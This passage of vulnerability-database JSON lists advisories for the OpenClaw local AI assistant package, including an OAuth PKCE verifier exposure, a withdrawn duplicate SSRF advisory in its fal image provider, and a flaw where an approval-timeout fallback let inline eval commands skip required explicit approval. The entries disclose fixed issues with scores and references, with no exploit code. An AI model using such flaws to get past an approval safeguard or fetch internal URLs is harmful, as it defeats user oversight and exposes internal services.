reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34511","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11185","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11219","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11226","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34511"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34511","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34511"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter"},{"reference_url":"https://github.com/advisories/GHSA-9jpj-g8vv-j5mf","reference_id":"GHSA-9jpj-g8vv-j5mf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9jpj-g8vv-j5mf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-34511","GHSA-9jpj-g8vv-j5mf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bgwh-spue-yybk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91210?format=json","vulnerability_id":"VCID-bk76-1ctt-tkaw","summary":"Duplicate Advisory: OpenClaw affected by SSRF via unguarded image download in fal provider\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qxgf-hmcj-3xw3. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a server-side request forgery vulnerability in the fal provider image-generation-provider.ts component that allows attackers to fetch internal URLs. A malicious or compromised fal relay can exploit unguarded image download fetches to expose internal service metadata and responses through the image pipeline.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34504","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34504"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider"},{"reference_url":"https://github.com/advisories/GHSA-35cq-wv6v-88xf","reference_id":"GHSA-35cq-wv6v-88xf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-35cq-wv6v-88xf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-35cq-wv6v-88xf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bk76-1ctt-tkaw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90222?format=json","vulnerability_id":"VCID-bkya-73v8-bber","summary":"OpenClaw: strictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts\n## Impact\n\nstrictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts.\n\nThe approval-timeout fallback could allow inline eval commands that strictInlineEval was meant to require explicit approval for.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42423","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17378","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17414","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17419","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42423"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q2gc-xjqw-qp89","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q2gc-xjqw-qp89"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42423","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42423"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-strictinlineeval-approval-boundary-bypass-via-approval-timeout-fallback","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-strictinlineeval-approval-boundary-bypass-via-approval-timeout-fallback"},{"reference_url":"https://github.com/advisories/GHSA-q2gc-xjqw-qp89","reference_id":"GHSA-q2gc-xjqw-qp89","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q2gc-xjqw-qp89"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf